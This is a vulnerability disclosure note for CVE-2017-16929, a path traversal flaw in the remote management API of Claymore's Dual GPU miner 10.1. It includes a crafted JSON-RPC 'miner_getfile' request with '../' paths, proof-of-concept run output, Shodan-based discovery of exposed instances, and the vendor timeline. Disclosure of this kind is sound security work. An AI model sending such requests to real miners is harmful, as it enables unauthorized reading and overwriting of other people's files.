VuNote=================== Author: <github.com/tintinweb> Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2017-16929 Version: 0.2 Date: Nov 30th, 2017 Tag: claymore dual ethereum decred crypto currency minerOverview——– Name: Claymore's Dual ETH + DCR/SC/LBC/PASC GPU Miner Vendor: nanopool/claymore References: * https://github.com/nanopool/Claymore-Dual-Miner * https://bitcointalk.org/index.php?topic=1433925.0 Version: 10.1 [2] Latest Version: 10.1 [2] Other Versions: <= 10.1 Platform(s): windows, linux Technology: C/C++ Vuln Classes: CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Origin: remote Min. Privs.: authenticated Source: Closed; runtime protection mechanisms CVE: CVE-2017-16929Description———A specialized mining solution with remote management interface for mining ethereum / decred / siacoin / LBRY Credits /pascal coin.quote website [1][2] – Supports new "dual mining" mode: mining both Ethereum and Decred/Siacoin/Lbry/Pascal at the same time, with no impact on Ethereum mining speed. Ethereum-only mining mode is supported as well. – Effective Ethereum mining speed is higher by 3-5% because of a completely different miner code – much less invalid and outdated shares, higher GPU load, optimized OpenCL code, optimized assembler kernels. – Supports both AMD and nVidia cards, even mixed. – No DAG files. – Supports all Stratum versions for Ethereum: can be used directly without any proxies with all pools that support eth-proxy, qtminer or miner-proxy. – Supports Ethereum and Siacoin solo mining. – Supports both HTTP and Stratum for Decred. – Supports both HTTP and Stratum for Siacoin. Note: not all Stratum versions are supported currently for Siacoin. – Supports Stratum for Lbry and Pascal. – Supports failover. – Displays detailed mining information and hashrate for every card. – Supports remote monitoring and management. – Supports GPU selection, built-in GPU overclocking features and temperature management. – Supports Ethereum forks (Expanse, etc). – Windows and Linux versions.Summary——-> "FOMO driven security blindness."The remote management interface on the Claymore Dual GPU miner 10.1 is vulnerable to an authenticated relative directorytraversal vulnerability exploited by issuing a specially crafted remote management request, allowing a remote attackerto read/write arbitrary files due to missing path validation/sanitation.* API calls * miner_getfile (read) … read any file * miner_file (write) … write any fileconditions:* authenticated* write: *not* in readonly modeSuccessful exploitation would allow an authenticated user to read/write arbitrary files (process permissions)See attached PoC.Details——-Service Discovery:* shodan: 'eth result' lists about 170-240 publicly available instances [3] with significant hash power* banner:“`html<html><body bgcolor="#000000" style="font-family: monospace;">{"result": ["10.1 – ETH", "4286", "149336;7492;0", "30620;29877;28285;30605;29946", "0;0;0", "off;off;off;off;off", "62;65;51;64;61;75;51;67;62;72", "eth-us-east1.nanopool.org:9999", "0;1;0;0"]}<br><br><font color="#ff0000">Remote management: read-only mode, command miner_file ignored</font><br><font color="#00ff00">ETH: 11/22/17-15:28:38 – SHARE FOUND – (GPU 3)….“`Remote Management API overview:“`json# >nc -L -p 3333{"id":0,"jsonrpc":"2.0","method":"miner_getstat1"}{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["epools.txt","<encoded>"]}{"id":0,"jsonrpc":"2.0","method":"miner_getfile","params":["config.txt"]}{"id":0,"jsonrpc":"2.0","method":"miner_restart"}{"id":0,"jsonrpc":"2.0","method":"miner_reboot"}{"id":0,"jsonrpc":"2.0","method":"control_gpu","params":["0", "1"]}{"id":0,"jsonrpc":"2.0","method":"control_gpu","params":["-1", "0"]}{"id":0,"jsonrpc":"2.0","method":"control_gpu","params":["0", "2"]}{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["config.txt","<encoded>"]}{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["dpools.txt","<encoded>"]}“`Directory Traversal:* `miner_file` and `miner_getfile`both commands do not seem to attempt to sanitize the provided path in any way allowing for relative path traversal.“`python# Vector: traversal# Description: path traversal# Result: retrieves any file"traversal": {"id":0, "jsonrpc":"2.0", "method":"miner_getfile", "params":["../Claymore.s.Dual.Ethereum.Decred_Siacoin_Lbry_Pascal.AMD.NVIDIA.GPU.Miner.v10.0/config.txt"]}, ##<<– path travesal“`//see PoC vector: traversalSee attached PoC.Proof of Concept—————-Prerequisites:* compatible AMD/NVidia hardware1. start miner in read/write mode with no passwort being set for testing“`#> EthDcrMiner64.exe -epool http://192.168.0.1:8545 -mport 3333…“`2. run poc.py –vector=traversal <target> (we expect EthDcrMiner64.exe to be placed in a directory called `/Claymore.s.Dual.Ethereum.Decred_Siacoin_Lbry_Pascal.AMD.NVIDIA.GPU.Miner.v10.0`)“`python[poc.py – <module>() ][ INFO] –start–[poc.py – <module>() ][ INFO] # Claymore's Dual ETH + DCR/SC/LBC/PASC GPU Miner – Remote Buffer Overwrite[poc.py – <module>() ][ INFO] # github.com/tintinweb[poc.py – iter_targets() ][ WARNING] shodan apikey missing! shodan support disabled.[poc.py – <module>() ][ INFO] [i] Target: 127.0.0.1:3333[poc.py – <module>() ][ INFO] [+] connected.[poc.py – <module>() ][ DEBUG] <– 1048 '{"id": 0, "error": null, "result": ["../Claymore.s.Dual.Ethereum.Decred_Siacoin_Lbry_Pascal.AMD.NVIDIA.GPU.Miner.v10.0/config.txt", "<encoded file data>"]}'[poc.py – <module>() ][ INFO] –done–“`3. EthDcrMiner returned the files content, as shown in the logs.“`python… DCR: 11/22/17-22:56:06 – New job from pasc-eu2.nanopool.org:15555Remote management: file ..\Claymore.s.Dual.Ethereum.Decred_Siacoin_Lbry_Pascal.AMD.NVIDIA.GPU.Miner.v10.0\config.txt was uploaded DCR: 11/22/17-22:56:16 – New job from pasc-eu2.nanopool.org:15555…“`Patch—– n/A – closed source :/Notes—–* Timeline 11/22/2017 – vendor contact: report sent 11/23/2017 – vendor response: fixed version 10.2 ready and publicly available request for 7+ day embargo vendor statement: The root case is that remote management was designed to be used in local network only. But some "smart" people want to share ports to everyone and then catch problems. I will close the issues you found, but attacker will be able to do something bad anyway, at least execute ddos to prevent remote management work as expected. 12/04/2017 – public disclosure* Vendor ChangelogLatest version is v10.2: – fixed critical issues in remote management feature (attacker could crash miner even in read-only mode). – now miner supports up to #299 epoch. – in rare cases ADL API calls can hang, now watchdog checks it as well. – improved "-minspeed" option, check readme for details. – added "miner_getstat2" command to remote management, check "API.txt" for details. – EthMan: added detailed stats mode in main window. – a few minor improvements in both miner and EthMan.* Runtime Protection“`* Linux: packer / just compression * gdb* Windows: protector / anti-debug, vmprotect? * x64dbg: DbgUiRemoteBreakin <- RET“`
